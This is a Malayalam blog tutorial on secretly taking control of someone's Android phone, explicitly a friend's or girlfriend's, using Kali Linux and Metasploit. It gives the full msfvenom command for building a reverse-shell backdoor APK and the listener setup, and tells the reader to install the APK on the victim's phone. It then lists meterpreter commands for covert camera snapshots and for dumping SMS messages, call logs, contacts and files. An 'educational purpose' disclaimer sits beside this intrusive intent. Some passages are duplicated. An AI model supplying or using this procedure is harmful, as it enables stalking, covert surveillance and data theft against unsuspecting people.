എല്ലാവര്ക്കും ഇന്ന് ആൻഡ്രോയിഡ് ഫോണുകൾ ഉണ്ട് .അതുകൊണ്ടുതന്നെ അവ ഹാക്ക് ചെയ്യപ്പെടാനുള്ള സാധ്യതകളും കൂടുതലാണ് .നമ്മളും പലപ്പോഴെങ്കിലും നമ്മുടെ girl friends ന്റെയോ friends ന്റെയോ ഫോൺ ഹാക്ക് ചെയ്യണമെന്ന് ചിന്തിച്ചിട്ടുള്ളവരായിരിക്കും.kali linux ൽ അതിനുള്ള വഴികൾ ഉണ്ട് .backdoor എന്ന ഒരു പ്രോഗ്രാം ആണ് നമ്മൾ അതിനായി ഉപയോഗിക്കുന്നത് .അതിലേക്കെല്ലാം കടക്കുന്നതിനു മുന്പായി മറ്റൊരു കാര്യം പറയട്ടെ .മറ്റുള്ളവരുടെ privacy യിൽ അവരറിയാതെ കടന്നു കയറാൻ ആർക്കും അധികാരമില്ല .അതുകൊണ്ടു തന്നെ ഇ tutorial ഒരു educational purpose നു വേണ്ടി മാത്രമാണ് വിശദീകരിക്കുന്നത് .illegal ആയി ഇത് ഉപയോഗിക്കുന്നത് നിങ്ങളുടെ മാത്രം responsibility ആയിരിക്കും.
എന്താണ് Backdoor
Backdoor എന്നാൽ ഒരു malicious അപ്ലിക്കേഷൻ പ്രോഗ്രാം ആണ് .ഇ പ്രോഗ്രാം മറ്റൊരാളുടെ device ൽ install ചെയ്താൽ അവരുടെ device നെ നമുക്ക് റിമോട്ട് ആയി കൺട്രോൾ ചെയ്യുവാൻ കഴിയും.
ഹാക്കിങ് നു ആവശ്യം ആയ കാര്യങ്ങൾ
1)kali linux(കാളി ഇൻസ്റ്റാൾ ചെയ്യുന്നത് ഞാൻ മുൻപ് വിശദീകരിച്ചിരുന്ന്നു.ഇ ലിങ്കിൽ കയറിയാൽ നിങ്ങൾക് അത് കാണാം click to see the installation of linux )
2 )smart phone of victim
Steps :-
എന്താണ് Backdoor
Backdoor എന്നാൽ ഒരു malicious അപ്ലിക്കേഷൻ പ്രോഗ്രാം ആണ് .ഇ പ്രോഗ്രാം മറ്റൊരാളുടെ device ൽ install ചെയ്താൽ അവരുടെ device നെ നമുക്ക് റിമോട്ട് ആയി കൺട്രോൾ ചെയ്യുവാൻ കഴിയും.
ഹാക്കിങ് നു ആവശ്യം ആയ കാര്യങ്ങൾ
1)kali linux(കാളി ഇൻസ്റ്റാൾ ചെയ്യുന്നത് ഞാൻ മുൻപ് വിശദീകരിച്ചിരുന്ന്നു.ഇ ലിങ്കിൽ കയറിയാൽ നിങ്ങൾക് അത് കാണാം click to see the installation of linux )
2 )smart phone of victim
Steps :-
1)Terminal ഓപ്പൺ ആക്കുക
2 )നമ്മൾ metasploit framework ഉപയോഗിച്ചാണ് backdoor ഉണ്ടാക്കാൻ പോകുന്നത് .msfvenem എന്ന കമാൻഡ് ആണ് നമ്മൾ ഉപയോഗിക്കാൻ പോകുന്നത് .ഇവിടെ ഉണ്ടാകാൻ പോവുന്ന backoor hacking.apk ആണ് .
terminal ൽ താഴെ പറയുന്ന പോലെ ടൈപ്പ് ചെയ്യുക .
msfvenom -p android/meterpreter/reverse_tcp LHOST=attacker_system_ip LPORT=4444 R > hacking.apk
ഇതിൽ attacker ip എന്നുള്ളത് നമ്മുടെ കമ്പ്യൂട്ടർ ന്റെ ip ആണ് .ഇത് കണ്ടെത്താനായി മറ്റൊരു ടെർമിനൽ ഓപ്പൺ ആക്കി(റൈറ്റ് click ചെയ്ത അതിൽ
open terminal എടുക്കുക )എന്നിട് അതിൽ ifconfig എന്ന് ടൈപ്പ് ചെയ്യുക എന്റർ കൊടുക്കുക
അപ്പോൾ കണുന്ന ലിസ്റ്റ് ൽ wlan0: എന്ന് കാണുന്നതിൽ inet നു കൊടുത്തിട്ടുള്ള address(eg:192.168.x.x) copy
ചെയ്ത അത് attacker ip യിൽ കൊടുക്കുക.
3)കമാൻഡ് success ആയി റൺ ചെയ്‌താൽ നമ്മൾ backdoor create
ചെയ്തു എന്നാണ് അർഥം
ഇപ്പോൾ ഉണ്ടാക്കിയ payload
reverse_ tcpയിൽ ആണ് വർക്ക് ചെയ്യുന്നത് .അതായത്
അറ്റാക്കർ പിസി യിലെ ഒരു പ്രേത്യേഗ port(ഇവിടെ 4444 ) ൽ ആണ്
അത് listen ചെയ്യുക എന്ന് .
അടുത്തതായി terminal
root@kali:~/# msfconsole
ഇ കമാൻഡ് ടൈപ്പ് ചെയ്ത enter കൊടുക്കുക.
4) നമുക്ക് നമ്മുടെ payload നെ handle ചെയ്യുവാൻ ആണ് ഇപ്പോൾ
msfconsole തുറന്നത്.
ഇതിൽ താഴെ പറയുന്ന കമാൻഡ് കൽ ടൈപ്പ് ചെയ്യുക
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
5)അതിനു ശേഷം താഴെ പറയുന്ന കമാൻഡ് കൽ ടൈപ്പ് ചെയ്യുക
set lhost 192.168.1.104
set lport 4444
exploit
ഇതിൽ lhost എന്നത് നമ്മുടെ system ip യും lport നമ്മൾ
മുൻപ് കൊടുത്ത port number(ഇവിടെ 4444 ) ആണ് .
6)ഇപ്പോൾ നമ്മൾ listen ചെയ്തുകൊണ്ടിരിക്കുകയാണ്.victim ന്റെ
ഫോൺ ൽ payload (ഇവിടെ hacking.apk)
ഇൻസ്റ്റാൾ ആയാൽ ഇവിടെ കാണിക്കും ..അതുകൊണ്ട് ഇത് close ചെയ്യരുത് .
7)നമ്മൾ മുൻപ് create ചെയ്ത hacking.apk ഫയൽ files ൽ home
ഡിറക്ടറിയിൽ ഉണ്ടാകും.
ഇത് victim ന്റെ ഫോണിൽ ഇൻസ്റ്റാൾ ചെയ്യുക .ഇൻസ്റ്റാൾ ചെയ്ത അത്
ഒരു തവണ ഓപ്പൺ ആകയാൽ മുൻപ്
നമ്മൾ listen ചെയ്യുന്നിടത് കാണിക്കും താഴെ
ഇപ്പോൾ victim ന്റെ android phone ന്റെ
full controll നമ്മുടെ കയ്യിൽ ആയി
8 )ഇനി ആവശ്യമായ കമാൻഡ് കൾ ഉപയോഗിച്ച് victim ന്റെ ഫോൺ ൽ ഉള്ള എല്ലാം നമുക് ലഭിക്കുന്നതാണ് .കുറച്ചു command കൾ താഴെ കൊടുക്കുന്നു .
webcam_snap - snapshot എടുക്കാൻ കാമറ ഉപയോഗിച്ച്
dump_calllog - call log കിട്ടാൻ
dump_contacts - contacts list കിട്ടാൻ
dump_sms - sms messages കിട്ടാൻ
cat - ഒരു ഫയൽ ലെ contents സ്‌ക്രീനിൽ കാണിക്കാൻ
dump_contacts - contacts list കിട്ടാൻ
dump_sms - sms messages കിട്ടാൻ
cat - ഒരു ഫയൽ ലെ contents സ്‌ക്രീനിൽ കാണിക്കാൻ
download -ഒരു ഫയൽ ഡൌൺലോഡ് ചെയ്യാൻ
rm - ഒരു ഫയൽ delete ചെയ്യാൻ
upload - ഒരു ഫയൽ അപ്‌ലോഡ് ചെയ്യാൻ .
ഇനിയും ധാരാളം കമാൻഡ് കൾ ഉണ്ട് അവ ഗൂഗിൾ ൽ ലഭ്യമാണ് .നിങ്ങൾക് ആവസ്യമെങ്കിൽ comment ബോക്സ് ൽ ചോദിച്ചാൽ എല്ലാ കമാൻഡ് കളും താരവുന്നതാണ്
.
No comments:
Write comments